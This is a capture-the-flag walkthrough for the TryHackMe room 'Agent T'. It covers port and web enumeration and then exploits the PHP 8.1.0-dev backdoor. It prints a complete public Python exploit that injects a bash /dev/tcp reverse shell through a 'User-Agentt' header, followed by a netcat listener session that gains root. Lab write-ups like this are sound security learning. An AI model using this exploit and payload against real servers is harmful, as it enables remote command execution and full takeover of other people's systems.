Tryhackme Agent T Walk through
Room Name:Agent T
Url:https://tryhackme.com/room/agentt
Rating : Easy
Enumeration
We will first start off by doing some recon on the room.We begin by conducting nmap scans for both TCP and UDP ports.
sudo nmap — min-rate=1000 -p0–65535 10.10.147.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022–08–06 09:23 EAT
Nmap scan report for 10.10.147.137
Host is up (0.16s latency).
Not shown: 65535 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
From the full tcp scan we can see that we only have one open port which is http on port 80.We will proceed to conducting the scripts and version scans.
sudo nmap -sC -sV -p80 -oA nmap/tcp_ports 10.10.147.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022–08–06 09:26 EAT
Nmap scan report for 10.10.147.137
Host is up (0.16s latency).PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin DashboardService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.07 seconds
UDP Scan
Nmap UDP scan did not result in anything useful.
sudo nmap --min-rate=1000 -sU 10.10.147.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-06 09:32 EAT
Nmap scan report for 10.10.147.137
Host is up (0.24s latency).
Not shown: 991 open|filtered udp ports (no-response)
PORT STATE SERVICE
1000/udp closed ock
5003/udp closed filemaker
5093/udp closed sentinel-lm
17468/udp closed unknown
19227/udp closed unknown
20851/udp closed unknown
47915/udp closed unknown
49226/udp closed unknown
57409/udp closed unknownVisiting the site on the URL takes us to the site’s admin dashboard and we are logged in as the administrator.We will then do content discovery on the page source, try checking for robots.txt,try different payloads on the search page but this didn’t result anything successful.
When we run ferroxbuster against the target url we did not identoy anthing useful.
feroxbuster -u http://10.10.147.137/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben “epi” Risher 🤓 ver: 2.7.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.147.137/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD GET 755l 2101w 0c Got 200 for http://10.10.147.137/d388792219a740c694cab0d4d6dd1e0e (url length: 32)
[####################] — 11m 30000/30000 0s found:1 errors:0
[####################] — 11m 30001/30000 43/s http://10.10.147.137/
From our nmap tcp scan above and from the nikto scan we identify that the application is running PHP/8.1.0-dev.
nikto -host 10.10.147.137
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 10.10.147.137
+ Target Hostname: 10.10.147.137
+ Target Port: 80
+ Start Time: 2022–08–06 09:32:33 (GMT3)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible
We will go ahead and search on exploits affecting PHP/8.1.0-dev which results in the following interesting documentations:
- https://www.exploit-db.com/exploits/49933
- https://github.com/flast101/php-8.1.0-dev-backdoor-rce
- https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
- ttps://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
From these articles we learn of the existing PHP/8.1.0-dev backdoor.Testing user-agentt results in an exception.
We will proceed to using the python backdoor script.Which gives us a limited root access to the box.
python3 backdoor.py
Enter the host url:
http://10.10.147.137/Interactive shell is opened on http://10.10.147.137/
Can’t acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)$ pwd
/var/www/html$ cd /home
$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor$ cd vendor
$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor$ cd /root
Shell as Root
rev_shell.py content
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution# Date: 23 may 2021# Exploit Author: flast101# Vendor Homepage: https://www.php.net/# Software Link:# - https://hub.docker.com/r/phpdaily/php# - https://github.com/phpdaily/php# Version: 8.1.0-dev# Tested on: Ubuntu 20.04# CVE : N/A# References:# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md"""Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.pyContact: flast101.sec@gmail.comAn early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.The following exploit uses the backdoor to provide a pseudo shell ont the host.Usage:python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>"""#!/usr/bin/env python3import os, sys, argparse, requestsrequest = requests.Session()def check_target(args):response = request.get(args.url)for header in response.headers.items():if "PHP/8.1.0-dev" in header[1]:return Truereturn Falsedef reverse_shell(args):payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)def main():parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")parser.add_argument("url", metavar='<target URL>', help="Target URL")parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")args = parser.parse_args()if check_target(args):reverse_shell(args)else:print("Host is not available or vulnerable, aborting...")exitif __name__ == "__main__":main()
python3 rev_shell.py
usage: rev_shell.py [-h] <target URL> <attacker IP> <attacker PORT>
rev_shell.py: error: the following arguments are required: <target URL>, <attacker IP>, <attacke
with our listener set we run the script above
python3 rev_shell.py http://10.10.147.137/ ATTACKER IP LISTENING-PORT
and obtain a shell as root
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.9.90.128] from (UNKNOWN) [10.10.147.137] 34130
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@3f8655e43931:/var/www/html# cd /home
cd /home
root@3f8655e43931:/home# ls
root@3f8655e43931:~# find / -type f -name flag.txt
find / -type f -name flag.txt
/flag.txt
Thank you for the read.
Until next time!!